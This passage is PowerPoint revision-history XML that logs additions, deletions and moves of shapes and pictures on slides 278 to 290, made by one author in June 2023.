        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:48:08.881" v="2634" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="480702028" sldId="278"/>
            <ac:picMk id="5122" creationId="{92EED7C6-9786-5CCF-3FB3-FF4EA1D3A969}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modAnim">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:35:55.704" v="6553" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3810465272" sldId="279"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:50:38.864" v="2666" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3810465272" sldId="279"/>
            <ac:spMk id="2" creationId="{7C521570-26DA-291C-6A31-09A70B1255A6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:35:55.704" v="6553" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3810465272" sldId="279"/>
            <ac:spMk id="4" creationId="{FA2E8818-0693-BCD8-9B20-EA56E7EFC319}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:35:55.704" v="6553" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3810465272" sldId="279"/>
            <ac:picMk id="5" creationId="{D5ABBC57-C34A-2998-8E75-8681FAFC191B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:53:40.229" v="2679"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="565196234" sldId="280"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:53:09.356" v="2668" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="565196234" sldId="280"/>
            <ac:spMk id="2" creationId="{B6B52430-6C4D-79B0-B54D-F3025B48F53B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:53:27.944" v="2677"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="565196234" sldId="280"/>
            <ac:spMk id="3" creationId="{AED2CB1E-FDA4-0D51-0D40-E9712376BFAF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:53:40.229" v="2679"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="565196234" sldId="280"/>
            <ac:spMk id="4" creationId="{7797A732-5D33-D7D8-7A9B-E7381DD67B1A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:23:25.977" v="3504" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1921238708" sldId="281"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:54:03.648" v="2681" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1921238708" sldId="281"/>
            <ac:spMk id="2" creationId="{08DC0302-6A6D-E5E0-8BE0-47B68289352D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:54:03.648" v="2681" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1921238708" sldId="281"/>
            <ac:spMk id="3" creationId="{A1AC6808-8755-2F13-47C2-2EDC10286DB2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:19:24.196" v="3232" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1921238708" sldId="281"/>
            <ac:spMk id="4" creationId="{E6176B03-2CC8-9E65-AF07-FF6E28A1D4C4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:19:20.776" v="3231"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1921238708" sldId="281"/>
            <ac:spMk id="5" creationId="{AA5AEC30-AB2E-7FD7-9AC1-B61A41743CE7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:23:25.977" v="3504" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1921238708" sldId="281"/>
            <ac:spMk id="6" creationId="{7E94A19E-4A35-3E0F-8C0C-66243AC01612}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:06:26.306" v="2972" actId="122"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1720089293" sldId="282"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:55:31.638" v="2695" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1720089293" sldId="282"/>
            <ac:spMk id="2" creationId="{700E909F-8746-8848-5CA9-B220B4C319A9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:55:13.405" v="2691" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1720089293" sldId="282"/>
            <ac:spMk id="4" creationId="{0EFBF3DD-3848-A857-6372-23B5B556A150}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:55:28.020" v="2694" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1720089293" sldId="282"/>
            <ac:spMk id="5" creationId="{A35108C2-2E41-3C0E-CD05-19082E89F559}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:55:53.300" v="2700" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1720089293" sldId="282"/>
            <ac:spMk id="6" creationId="{75774408-F7B0-34FA-A9C4-E0889E0D0275}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:58:33.632" v="2766" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1720089293" sldId="282"/>
            <ac:spMk id="9" creationId="{94EBBE3D-2921-9BD5-9E61-76AE71376476}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:06:26.306" v="2972" actId="122"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1720089293" sldId="282"/>
            <ac:graphicFrameMk id="7" creationId="{A62E73AD-0F60-59D7-F6CD-CF3B2F2E44D9}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-16T11:31:04.419" v="6834" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3307503831" sldId="283"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:58:49.140" v="2770" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3307503831" sldId="283"/>
            <ac:spMk id="2" creationId="{6728ED94-6283-18EC-83EF-80B8C868FE2C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T17:59:14.812" v="2771" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3307503831" sldId="283"/>
            <ac:spMk id="3" creationId="{6DDC31F5-9418-E54F-4483-AE5CE660237E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:01:46.231" v="2845" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3307503831" sldId="283"/>
            <ac:spMk id="5" creationId="{51283719-E0A6-4E7E-8D55-F6F260148C0D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-16T11:31:04.419" v="6834" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3307503831" sldId="283"/>
            <ac:spMk id="7" creationId="{39CE9127-98E4-44AD-8352-A172D8951727}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:11:38.589" v="3107" actId="13926"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3373704992" sldId="284"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:08:55.122" v="3069"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3373704992" sldId="284"/>
            <ac:spMk id="2" creationId="{46A436D2-46EC-9395-AEC1-12CD00ABF654}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:09:00.487" v="3070" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3373704992" sldId="284"/>
            <ac:spMk id="3" creationId="{2FD721E9-68D1-16F1-98AA-F0F82A9B0815}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:11:34.321" v="3106" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3373704992" sldId="284"/>
            <ac:spMk id="5" creationId="{5C75CA55-D2FB-A426-1269-D7B625CA3D97}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:10:07.562" v="3093" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3373704992" sldId="284"/>
            <ac:spMk id="6" creationId="{5D9CBCB2-D932-B5B8-2900-0269DFF91940}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:11:38.589" v="3107" actId="13926"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3373704992" sldId="284"/>
            <ac:spMk id="7" creationId="{DC1B510B-C8AE-F5EA-6410-131203C4389F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:16:53.451" v="3162" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2547131548" sldId="285"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:11:51.822" v="3111" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2547131548" sldId="285"/>
            <ac:spMk id="2" creationId="{6B30BC24-F638-E821-1F98-266E6FC62E6E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:12:22.928" v="3119" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2547131548" sldId="285"/>
            <ac:spMk id="3" creationId="{AD594E73-D4B9-8DDA-D581-4555E11BCD2C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:16:53.451" v="3162" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2547131548" sldId="285"/>
            <ac:spMk id="5" creationId="{8B16F237-6609-8226-62D3-981CBB06969A}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modAnim">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:36:16.495" v="6554" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4112596445" sldId="286"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:19:23.700" v="3183" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4112596445" sldId="286"/>
            <ac:spMk id="2" creationId="{3F6ED93D-7EB4-A4A1-A503-C45FD9609E10}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:06:11.977" v="5808" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4112596445" sldId="286"/>
            <ac:spMk id="3" creationId="{274B3AA7-BA22-B79F-B7A4-50D9C448C045}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:36:16.495" v="6554" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4112596445" sldId="286"/>
            <ac:spMk id="5" creationId="{A0FEFEED-BB15-EAA3-EA39-AE7FE014478E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-09T06:06:27.770" v="5813" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4112596445" sldId="286"/>
            <ac:spMk id="7" creationId="{415E8851-EA96-BFA8-5F29-809578581005}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:36:16.495" v="6554" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4112596445" sldId="286"/>
            <ac:picMk id="8" creationId="{51DEC881-6ACE-3B47-26FB-4CD11B2DBEB8}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:21:53.573" v="3201" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1315385384" sldId="287"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:21:46.443" v="3197" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1315385384" sldId="287"/>
            <ac:spMk id="2" creationId="{A87F508E-B536-9125-DBE0-9F03F64DEB23}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:21:46.443" v="3197" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1315385384" sldId="287"/>
            <ac:spMk id="3" creationId="{36621C58-2817-B695-7A1B-7A6998AB9BDF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:21:48.800" v="3198" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1315385384" sldId="287"/>
            <ac:spMk id="4" creationId="{6C241705-731C-E754-6D1A-0160B18CC6DF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:21:48.800" v="3198" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1315385384" sldId="287"/>
            <ac:spMk id="5" creationId="{20D5790C-8EF6-7176-B74B-E03FC16CFAF5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:21:53.573" v="3201" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1315385384" sldId="287"/>
            <ac:spMk id="6" creationId="{61B6EFEE-4966-DB3F-0EF4-F286FF6033B2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:21:48.800" v="3198" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1315385384" sldId="287"/>
            <ac:spMk id="7" creationId="{CB0ACBEF-3B4F-67D3-9076-AF2AB69A76FE}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-11T06:22:43.622" v="6120" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1279794145" sldId="288"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:21:59.865" v="3203" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1279794145" sldId="288"/>
            <ac:spMk id="2" creationId="{B6F26564-6992-3CFE-95E8-1A602AFEA268}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:21:59.865" v="3203" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1279794145" sldId="288"/>
            <ac:spMk id="3" creationId="{25E2C093-EC4B-5E75-FCA1-5DADCB45DF49}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:21:59.865" v="3203" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1279794145" sldId="288"/>
            <ac:spMk id="4" creationId="{5433D402-CAF3-44D8-D294-96ECB4E85C2D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-11T06:22:43.622" v="6120" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1279794145" sldId="288"/>
            <ac:spMk id="5" creationId="{2926D49C-8FBB-278C-47C6-851CC0DEC0BF}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modAnim">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:33:27.844" v="6545" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2140134430" sldId="289"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:22:19.368" v="3217" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2140134430" sldId="289"/>
            <ac:spMk id="2" creationId="{90BAFA0D-BBC0-29B8-16E7-85AAC02EAB9B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:33:27.844" v="6545" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2140134430" sldId="289"/>
            <ac:spMk id="4" creationId="{DEB84ACE-FE60-E04A-2C09-E2FEE6442556}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-12T06:33:27.844" v="6545" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2140134430" sldId="289"/>
            <ac:picMk id="5" creationId="{B69AD525-2B7A-A20F-F002-94F50D10E711}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:26:53.366" v="3517" actId="404"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="808030390" sldId="290"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:26:46.479" v="3511" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="808030390" sldId="290"/>
            <ac:spMk id="2" creationId="{D0D48BD1-0485-E872-77D6-CA80F620D8D3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:26:53.366" v="3517" actId="404"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="808030390" sldId="290"/>
            <ac:spMk id="3" creationId="{4C61927F-643E-C4DB-9018-19A0C250998F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="new del">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-06T18:22:26.470" v="3219" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1558235699" sldId="290"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod">
        <pc:chgData name="昱佑 李" userId="4e53b750a6a762e3" providerId="LiveId" clId="{0405BC5A-C9A0-BC44-9BAC-6601BA038857}" dt="2023-06-07T03:26:27.934" v="3510" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
